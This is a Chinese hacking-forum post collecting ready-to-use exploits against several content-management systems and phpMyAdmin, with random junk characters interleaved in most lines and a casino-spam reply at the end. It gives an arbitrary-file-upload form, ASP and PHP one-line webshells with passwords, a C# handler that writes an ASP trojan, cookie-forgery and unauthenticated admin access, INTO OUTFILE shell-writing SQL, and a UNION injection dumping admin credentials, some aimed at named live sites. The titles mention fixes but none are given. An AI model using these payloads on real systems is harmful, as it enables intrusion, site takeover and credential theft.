8 p9 `0 M" ^) T  C4 w  aYxShop易想购物商城4.7.1版本任意文件上传漏洞
. ?" X4 k6 M9 G3 @& D5 {5 V9 P' @
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
! u! a' t2 J/ ]跳转到网站根目录上传任意文件。
) O7 n( C9 A) G  |. d& o如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件* Y8 O6 j6 s( s; J
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">, x1 C6 s$ h8 _/ F1 p8 z. @
Upload a new file:<br>+ _. J9 K8 _5 U
<input type="file" name="NewFile" size="50"><br>, }( t+ {7 Y  ~- z( ?& [7 z
<input id="btnUpload" type="submit" value="Upload">" \2 [6 @5 ~+ }, R- L$ L/ L
</form>
& b7 b# x/ s3 o------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ F0 J& Q! @& O. k9 ]8 ?2 L

# Q- [! e" F' ~SDcms 后台拿webshell. G2 R0 P( v/ }  U- v1 X

. k/ L& a, |% x+ C- t2 v第一种方法:
1 {0 F$ J2 c# g; V0 j4 W0 A进入后台-->系统管理-->系统设置-->系统设置->网站名称;% g) b) f7 O* H
把网站名称内容修改为   "%><%eval request("xxx")'    //密码为xxx: F. \4 S4 g! ^$ O
用菜刀链接http://www.xxx.com/inc/const.asp  就搞定了。6 Y% C( n) |' P5 U
第二种方法:$ [, L* e1 {: Q
进入后台-->系统管理-->系统设置-->系统设置->上传设置;0 B3 D0 [3 a, n) M3 t9 }5 N. S3 e
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!' `) @3 A1 H; x9 v' d
第三种方法:
7 y, h+ `% p. C" `' k' v) Y+ |进入后台-->界面管理-->模板文件管理-->创建文件
4 p! W" [4 M0 k文件名写入getshell.ashx
& G9 a7 Y6 b8 ]- _) x+ m: l内容写入下面内容:
' \; h" s) Z0 s. W/====================复制下面的=========================/
9 i' W' ]% f) [& |8 s<%@ WebHandler Language="C#" Class="Handler" %>/ Z1 E+ m+ y, _- d: r
using System;
2 s5 e# U4 o1 j! |: ?using System.Web;- N+ Q! U" H% r( E1 `% e
using System.IO;, s' [9 ~5 [& u4 w6 j# \' z8 |) V
public class Handler : IHttpHandler {: z; b2 n# K, H" m) g1 E+ G
public void ProcessRequest (HttpContext context) {
( {3 O- j9 c6 Ycontext.Response.ContentType = "text/plain";
' j% d- [1 x3 `) [0 o* {2 A6 UStreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
  @/ C! P3 D5 j3 }+ gfile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");2 W( I3 \* N+ t4 C, P
file1.Flush();% _, n! f3 I" S2 Z9 S1 s
file1.Close();
$ e" K3 y) M4 m, }& A* `2 L}
4 R7 \! R& }4 J* zpublic bool IsReusable {( ~& T( f. ]9 |8 c7 d  T6 b8 T
get {
: V& b; O- }% _) R' l1 Lreturn false;( K5 }$ l7 G/ e1 c, s
}% B0 |& m! @) L! b5 ]2 \7 L2 P% l
}" v+ z, d' N$ S0 n
}- t0 ~8 C6 o8 Q/ h9 k
/=============================================/
" Y8 f& g* z) T& \访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx7 ~% X& J6 w& q3 M$ |9 e
会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
% r# {+ W  f' ]; s3 V-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------7 }8 X2 \9 E8 i2 t2 E
* m0 `) C3 [, \; T& |
ESCMS网站管理系统0day$ @5 r0 q( q, K8 f6 X) L2 P* ?

: W/ {2 N& d% `4 z3 e7 g  o后台登陆验证是通过admin/check.asp实现的
# D$ M7 y2 s- F, `# _
: T! H6 P- ~; \  `首先我们打开http://target.com/admin/es_index.html% j% l6 @) g' s) i
然后在COOKIE结尾加上, D0 m  Z& _2 m$ G9 A! V" _6 ^
; ESCMS$_SP2=ES_admin=st0p;' r0 R3 y8 a, _' C+ q) k, k' ?
修改,然后刷新! \$ s; Y: W* P
进后台了嘎..
' N8 L8 B) z! P: x然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
8 G3 J! B! R- N5 @/ [, d! i# A6 x: n$ c) B1 i+ ^, `8 C
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.! R+ m/ l8 S2 {% ]2 w; W2 @
嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp! S8 d- x* V" y$ A
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..- }4 p# X% Z: d7 y
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
! M" g8 R$ o& z8 o* {( j2 Q/ K% u------------------------------------------------------------------------------------------------------------------------------------------------------------------------------5 x+ m5 }! K9 w6 \
& D( v: x8 p% p$ d3 W  a% g
宁志网站管理系统后台无验证漏洞及修复
; f, J/ V/ k, l  j9 Y# S8 z
4 _6 c  f* o' {  q网上搜了一下,好像没有发布.如有雷同纯粹巧合!3 U. ^4 G9 f/ I3 z3 i2 N3 M& J
官方网站:www.ningzhi.net
3 _$ L* P) n) J2 @0 |学校网站管理系统 V.2011版本 / J9 Y' ~7 i2 C6 ]1 y
http://down.chinaz.com/soft/29943.htm
- j9 L% `( C* u7 [& ^其它版本(如:政府版等),自行下载.
  K3 N& S  F* i, O漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
" ~, I7 Z" ?9 Flogin.asp代码如下:
8 Y3 f0 G+ i. _- M0 `<%  response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %> ; P. `, L! d1 ~: e' [* m
manage.asp代码我就不帖出来了.反正也没验证.
2 R3 b' }6 w: H7 l只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
8 a1 d* E! X2 j. i漏洞利用:" a2 ~' U" z! F) u. _9 ^
直接访问http://www.0855.tv/admin/manage.asp
9 L$ B4 ?- @. V; `& O数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
  n. F' Y* Y. G' p- O----------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ Z# e/ e1 G( c: l7 t0 |
  Y, O. e: D' C+ b0 v) I2 f
phpmyadmin拿shell的四种方法总结及修复
* `5 a6 x% g; v. u4 G9 c  Y
% j1 E0 @, M6 g方法一:" o4 ^9 T% w) C& v% H
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
9 B* @: h. ]2 e( k4 }2 IINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
, M, K& m% m  A3 T5 h8 kSELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
! v* y4 b  l# v3 A% B) N4 S----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
! P* ^+ U3 X- T3 {& M$ r8 @    一句话连接密码:7on2 y" \/ j% H( ?! g
方法二:' R) b* p2 A) S/ ~: F
读取文件内容:    select load_file('E:/xamp/www/s.php');; s) `% ^' G$ w1 \- H. R
写一句话:    select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
% q4 c6 l: `+ Z9 Fcmd执行权限:    select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'8 S8 L7 X9 F- y( y- I) K' X
方法三:
  q# r4 l' a; a. JJhackJ版本 PHPmyadmin拿shell; R5 K* t& x9 o0 d
Create TABLE study (cmd text NOT NULL);3 g7 H0 [: X, s) A- V: `
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
8 Q! D; d0 V6 G/ {3 b& _* M& bselect cmd from study into outfile 'E:/wamp/www/7.php';
7 I, C  S/ l) w& k- r, fDrop TABLE IF EXISTS study;' @$ T& ^) r* m  b& Z: T
<?php eval($_POST[cmd])?>! r8 k) X" r/ }1 H, I' L
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
! ^7 k% K' E! p( e. e" T, J. F  rINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
+ T3 F0 A: ]2 I5 x& d1 DSELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1, _8 ]+ W; \: C1 M4 i
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
, q  k9 `" a( I方法四:
* d, f7 U0 S0 I0 W/ Z5 Q' ]) V3 Fselect load_file('E:/xamp/www/study.php');
- r/ m7 J9 J4 l: A2 yselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
9 Z' L! F5 k$ \  {3 f0 p然后访问网站目录:http://www.2cto.com/study.php?cmd=dir
+ m( m0 v! O' A! s- @-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
' ?6 G8 L. J" D* ?' a% f; d& X, x9 M4 ?& s) ?
NO.001中学网站管理系统 Build 110628 注入漏洞
# R5 b( ]0 ^9 a! L$ a, W) ~& u* `, T
NO.001中学网站管理系统功能模块:
4 O9 J: d% J, s4 U  R1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等1 i# v" x( L1 k0 e1 K' l
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息1 P/ {# D! ?5 f( v9 q
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
. H2 H0 |6 n- f+ |* E4.视频图片管理:一级分类,动态添加视频或者图片等信息
( K3 v# P4 m9 n. L5.留言管理:对留言,修改,删除、回复等管理" c; d7 @: ?7 M# s( ?
6.校友频道:包括校友资料excel导出、管理等功能
- ]0 z' y- v/ g, I; {: T7 p4 Y5 |7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
3 H; g! Y0 E/ N% Y! L默认后台:admin/login.asp( D; p" ~6 T+ V6 j" q2 |
官方演示:http://demo.001cms.net
: Q$ T% N- ]# i- \+ g1 R8 b9 K源码下载地址:http://down.chinaz.com/soft/30187.htm6 J9 ~. q% |- h) E. x5 W
EXP:
8 f  A2 J. j. O4 j) t  Xunion select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
8 |; C, ^3 e) J) b- @2 K! b测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
" I) q9 {# y; i- [: j7 g$ mgetshell:后台有备份,你懂的3 M3 Z* N& i8 a4 V
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
( ~: v. S2 \& s" X. m-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
回复

使用道具 举报

沙发
匿名  发表于 2017-10-28 08:21:04
casino slots
online casino canada
new online casino
slot machines
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表